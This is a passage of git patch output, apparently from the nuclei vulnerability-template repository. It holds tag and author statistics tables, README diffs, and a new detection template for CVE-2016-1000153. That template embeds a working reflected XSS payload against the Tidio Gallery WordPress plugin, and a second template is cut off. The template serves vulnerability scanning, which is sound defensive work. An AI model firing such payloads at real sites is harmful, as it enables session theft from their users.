mahendra purbia (mah3sec_) | 2 | | | | | | | +| drupal | 5 | bp0lr | 2 | | | | | | | +| django | 5 | udit_thakkur | 2 | | | | | | | +| dell | 5 | nkxxkn | 2 | | | | | | | +| circarlife | 5 | bing0o | 2 | | | | | | | +| ibm | 5 | bsysop | 2 | | | | | | | +| ssti | 5 | ehsahil | 2 | | | | | | | +| confluence | 5 | gevakun | 2 | | | | | | | +| cve2009 | 5 | lotusdll | 2 | | | | | | | +| netgear | 5 | lu4nx | 2 | | | | | | | +| login | 5 | random-robbie | 2 | | | | | | | +| headless | 5 | randomrobbie | 2 | | | | | | | +| laravel | 5 | manas_harsh | 2 | | | | | | | +| solr | 5 | moritz nentwig | 2 | | | | | | | +| iis | 5 | unstabl3 | 2 | | | | | | | +| phpmyadmin | 5 | afaq | 2 | | | | | | | +| files | 5 | pxmme1337 | 2 | | | | | | | +| thinkphp | 4 | 0xprial | 2 | | | | | | | +| hongdian | 4 | emenalf | 2 | | | | | | | +| solarwinds | 4 | zomsop82 | 2 | | | | | | | +| magmi | 4 | shifacyclewala | 2 | | | | | | | +| tomcat | 4 | w4cky_ | 2 | | | | | | | +| samsung | 4 | foulenzer | 2 | | | | | | | +| jolokia | 4 | swissky | 2 | | | | | | | +| webserver | 4 | kiblyn11 | 2 | | | | | | | +| elastic | 4 | thevillagehacker | 1 | | | | | | | +| traversal | 4 | bernardo rodrigues | 1 | | | | | | | +| | | @bernardofsr | andré monteiro | | | | | | | | +| | | @am0nt31r0 | | | | | | | | +| vpn | 4 | sshell | 1 | | | | | | | +| artifactory | 4 | gal nagli | 1 | | | | | | | +| fileupload | 4 | mubassirpatel | 1 | | | | | | | +| nodejs | 4 | furkansenan | 1 | | | | | | | +| moodle | 4 | un-fmunozs | 1 | | | | | | | +| crlf | 4 | thezakman | 1 | | | | | | | +| asp | 4 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| docker | 4 | j33n1k4 | 1 | | | | | | | +| thinkcmf | 4 | kareemse1im | 1 | | | | | | | +| grafana | 3 | divya_mudgal | 1 | | | | | | | +| springcloud | 3 | 0xrod | 1 | | | | | | | +| slack | 3 | naglinagli | 1 | | | | | | | +| microstrategy | 3 | @dwisiswant0 | 1 | | | | | | | +| nacos | 3 | _darrenmartyn | 1 | | | | | | | +| ofbiz | 3 | johnjhacking | 1 | | | | | | | +| windows | 3 | bad5ect0r | 1 | | | | | | | +| nosqli | 3 | regala_ | 1 | | | | | | | +| backups | 3 | geraldino2 | 1 | | | | | | | +| fpd | 3 | smaranchand | 1 | | | | | | | +| kubernetes | 3 | wabafet | 1 | | | | | | | +| hp | 3 | gboddin | 1 | | | | | | | +| ebs | 3 | makyotox | 1 | | | | | | | +| targa | 3 | chron0x | 1 | | | | | | | +| ssh | 3 | g4l1t0 and @convisoappsec | 1 | | | | | | | +| vbulletin | 3 | akash.c | 1 | | | | | | | +| oa | 3 | fmunozs | 1 | | | | | | | +| r-seenet | 3 | daviey | 1 | | | | | | | +| amazon | 3 | blckraven | 1 | | | | | | | +| resin | 3 | alex | 1 | | | | | | | +| caucho | 3 | knassar702 | 1 | | | | | | | +| cve2010 | 3 | remonsec | 1 | | | | | | | +| mongodb | 3 | noamrathaus | 1 | | | | | | | +| fanruan | 3 | soyelmago | 1 | | | | | | | +| deserialization | 3 | shreyapohekar | 1 | | | | | | | +| log | 3 | ohlinge | 1 | | | | | | | +| git | 3 | cookiehanhoan | 1 | | | | | | | +| openssh | 3 | retr0 | 1 | | | | | | | +| terramaster | 3 | 0xtavian | 1 | | | | | | | +| bypass | 3 | bolli95 | 1 | | | | | | | +| kafka | 3 | ldionmarcil | 1 | | | | | | | +| lfr | 3 | fopina | 1 | | | | | | | +| printer | 3 | jeya seelan | 1 | | | | | | | +| frp | 2 | nytr0gen | 1 | | | | | | | +| jboss | 2 | rtcms | 1 | | | | | | | +| ucmdb | 2 | elmahdi | 1 | | | | | | | +| webcam | 2 | defr0ggy | 1 | | | | | | | +| plesk | 2 | c3l3si4n | 1 | | | | | | | +| microsoft | 2 | vsh00t | 1 | | | | | | | +| proxy | 2 | exploitation | 1 | | | | | | | +| trixbox | 2 | andysvints | 1 | | | | | | | +| paloalto | 2 | 52971 | 1 | | | | | | | +| xxljob | 2 | mah3sec_ | 1 | | | | | | | +| keycloak | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| smb | 2 | sickwell | 1 | | | | | | | +| linkerd | 2 | dawid czarnecki | 1 | | | | | | | +| natshell | 2 | affix | 1 | | | | | | | +| jellyfin | 2 | yashanand155 | 1 | | | | | | | +| globalprotect | 2 | mhdsamx | 1 | | | | | | | +| httpd | 2 | whynotke | 1 | | | | | | | +| hjtcloud | 2 | bjhulst | 1 | | | | | | | +| sonarqube | 2 | d0rkerdevil | 1 | | | | | | | +| cache | 2 | raesene | 1 | | | | | | | +| showdoc | 2 | undefl0w | 1 | | | | | | | +| vrealize | 2 | sushant kamble | 1 | | | | | | | +| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | +| dos | 2 | ipanda | 1 | | | | | | | +| kibana | 2 | co0nan | 1 | | | | | | | +| mida | 2 | patralos | 1 | | | | | | | +| oauth | 2 | sicksec | 1 | | | | | | | +| fortios | 2 | hakluke | 1 | | | | | | | +| rstudio | 2 | luci | 1 | | | | | | | +| strapi | 2 | ahmed sherif | 1 | | | | | | | +| cve2008 | 2 | streetofhackerr007 | 1 | | | | | | | +| shellshock | 2 | rojanrijal | 1 | | | | | | | +| openfire | 2 | 0ut0fb4nd | 1 | | | | | | | +| intrusive | 2 | alph4byt3 | 1 | | | | | | | +| kentico | 2 | b0yd | 1 | | | | | | | +| emerge | 2 | hanlaomo | 1 | | | | | | | +| kevinlab | 2 | revblock | 1 | | | | | | | +| hpe | 2 | sullo | 1 | | | | | | | +| mail | 2 | andirrahmani1 | 1 | | | | | | | +| ecology | 2 | sy3omda | 1 | | | | | | | +| yapi | 2 | kabirsuda | 1 | | | | | | | +| idrac | 2 | alifathi-h1 | 1 | | | | | | | +| splunk | 2 | idealphase | 1 | | | | | | | +| cve2007 | 2 | kba@sogeti_esec | 1 | | | | | | | +| rockmongo | 2 | deena | 1 | | | | | | | +| openam | 2 | taielab | 1 | | | | | | | +| zhiyuan | 2 | alperenkesk | 1 | | | | | | | +| seeyon | 2 | micha3lb3n | 1 | | | | | | | +| wordfence | 2 | shelld3v | 1 | | | | | | | +| smtp | 2 | becivells | 1 | | | | | | | +| odoo | 2 | s1r1u5_ | 1 | | | | | | | +| service | 2 | toufik airane | 1 | | | | | | | +| waf | 2 | luskabol | 1 | | | | | | | +| nagios | 2 | arcc | 1 | | | | | | | +| rockethchat | 2 | schniggie | 1 | | | | | | | +| zabbix | 2 | th3.d1p4k | 1 | | | | | | | +| chiyu | 2 | 0xteles | 1 | | | | | | | +| couchdb | 2 | _harleo | 1 | | | | | | | +| prometheus | 2 | pdp | 1 | | | | | | | +| injection | 2 | kurohost | 1 | | | | | | | +| telerik | 2 | notsoevilweasel | 1 | | | | | | | +| chamilo | 2 | ringo | 1 | | | | | | | +| nexus | 2 | pudsec | 1 | | | | | | | +| bigip | 2 | omarkurt | 1 | | | | | | | +| huawei | 2 | flag007 | 1 | | | | | | | +| glassfish | 2 | dogasantos | 1 | | | | | | | +| leak | 2 | vzamanillo | 1 | | | | | | | +| voipmonitor | 2 | yavolo | 1 | | | | | | | +| bitrix | 2 | @github.com/defr0ggy | 1 | | | | | | | +| pega | 2 | juicypotato1 | 1 | | | | | | | +| igs | 2 | ilovebinbash | 1 | | | | | | | +| maian | 2 | iampritam | 1 | | | | | | | +| spark | 2 | abison_binoy | 1 | | | | | | | +| hashicorp | 2 | 0h1in9e | 1 | | | | | | | +| saltstack | 2 | apt-mirror | 1 | | | | | | | +| icewarp | 2 | yashgoti | 1 | | | | | | | +| activemq | 2 | willd96 | 1 | | | | | | | +| sonicwall | 2 | absshax | 1 | | | | | | | +| sharepoint | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| nextjs | 2 | tirtha_mandal | 1 | | | | | | | +| redcap | 1 | _c0wb0y_ | 1 | | | | | | | +| mantis | 1 | r3naissance | 1 | | | | | | | +| npm | 1 | aceseven (digisec360) | 1 | | | | | | | +| anchorcms | 1 | j3ssie/geraldino2 | 1 | | | | | | | +| k8s | 1 | bernardofsr | 1 | | | | | | | +| shopxo | 1 | johnk3r | 1 | | | | | | | +| alibaba | 1 | rodnt | 1 | | | | | | | +| axis | 1 | akshansh | 1 | | | | | | | +| jsf | 1 | jteles | 1 | | | | | | | +| servicenow | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| expn | 1 | ratnadip gajbhiye | 1 | | | | | | | +| sco | 1 | its0x08 | 1 | | | | | | | +| h3c-imc | 1 | mohammedsaneem | 1 | | | | | | | +| powercreator | 1 | shifacyclewla | 1 | | | | | | | +| haproxy | 1 | aresx | 1 | | | | | | | +| gateone | 1 | ooooooo_q | 1 | | | | | | | +| plugin | 1 | zandros0 | 1 | | | | | | | +| duomicms | 1 | ajaysenr | 1 | | | | | | | +| addpac | 1 | berkdusunur | 1 | | | | | | | +| blind | 1 | qlkwej | 1 | | | | | | | +| netsweeper | 1 | petruknisme | 1 | | | | | | | +| javamelody | 1 | tim_koopmans | 1 | | | | | | | +| wiki | 1 | manuelbua | 1 | | | | | | | +| faraday | 1 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| ec2 | 1 | zhenwarx | 1 | | | | | | | +| mongoshake | 1 | b4uh0lz | 1 | | | | | | | +| xiuno | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| mcafee | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| horde | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| akamai | 1 | | | | | | | | | +| grav | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| azure | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| netis | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| hasura | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| dlogin | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| zimbra | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| payara | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| cacti | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| itop | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| wso2 | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| exchange | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| firebase | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| wp-theme | 1 | | | | | | | | | +| cve2005 | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| backdoor | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| glpi | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| akkadian | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| symfony | 1 | | | | | | | | | +| node | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| status | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index aa91abff69..0f79e9d451 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|-----------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | Users | 1693 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | | | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | | | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | | | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | | | low | 147 | | | -| rce | 173 | daffainfo | 99 | | | | | | | -| cve2020 | 145 | madrobot | 60 | | | | | | | -| lfi | 143 | princechaddha | 52 | | | | | | | -| wp-plugin | 120 | gy741 | 48 | | | | | | | -| config | 90 | gaurang | 42 | | | | | | | \ No newline at end of file +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| config | 90 | gaurang | 42 | workflows | 34 | | | | | From bc1e2b84ccc72b5f85e30b6a524e38e7988d9287 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 26 Jul 2021 17:59:44 +0000 Subject: [PATCH 1170/4083] Auto Update README [Mon Jul 26 17:59:44 UTC 2021] :robot: --- README.md | 24 ++++++++++++------------ 1 file changed, 12 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index 69cf066955..2806ca3c1a 100644 --- a/README.md +++ b/README.md @@ -40,18 +40,18 @@ An overview of the nuclei template project, including statistics on unique tags, ## Nuclei Templates Top 10 statistics -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|---------------|-------|-----------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | Users | 1693 | info | 535 | http | 1566 | -| panel | 202 | pikpikcu | 195 | | | high | 426 | file | 42 | -| xss | 182 | pdteam | 187 | | | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | | | critical | 201 | dns | 10 | -| exposure | 176 | geeknik | 119 | | | low | 147 | | | -| rce | 173 | daffainfo | 99 | | | | | | | -| cve2020 | 145 | madrobot | 60 | | | | | | | -| lfi | 143 | princechaddha | 52 | | | | | | | -| wp-plugin | 120 | gy741 | 48 | | | | | | | -| config | 90 | gaurang | 42 | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | +| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | +| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | +| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | +| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| config | 90 | gaurang | 42 | workflows | 34 | | | | | **138 directories, 1709 files**. From 47110e15cec7a17f084e1a7eacbaf20328fede82 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 27 Jul 2021 06:04:27 +0700 Subject: [PATCH 1171/4083] Create CVE-2016-1000153.yaml --- cves/2016/CVE-2016-1000153.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000153.yaml diff --git a/cves/2016/CVE-2016-1000153.yaml b/cves/2016/CVE-2016-1000153.yaml new file mode 100644 index 0000000000..c71b4ef368 --- /dev/null +++ b/cves/2016/CVE-2016-1000153.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000153 + +info: + name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000153 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 9db92fa24c3f3a05b535f197255f9a363b3883c8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 27 Jul 2021 06:09:33 +0700 Subject: [PATCH 1172/4083] Create CVE-2016-1000155.yaml --- cves/2016/CVE-2016-1000155.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000155.yaml diff --git a/cves/2016/CVE-2016-1000155.yaml b/cves/2016/CVE-2016-1000155.yaml new file mode 100644 index 0000000000..68e4fc346b --- /dev/null +++ b/cves/2016/CVE-2016-1000155.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000155 + +info: + name: WPSOLR <= 8.6 - 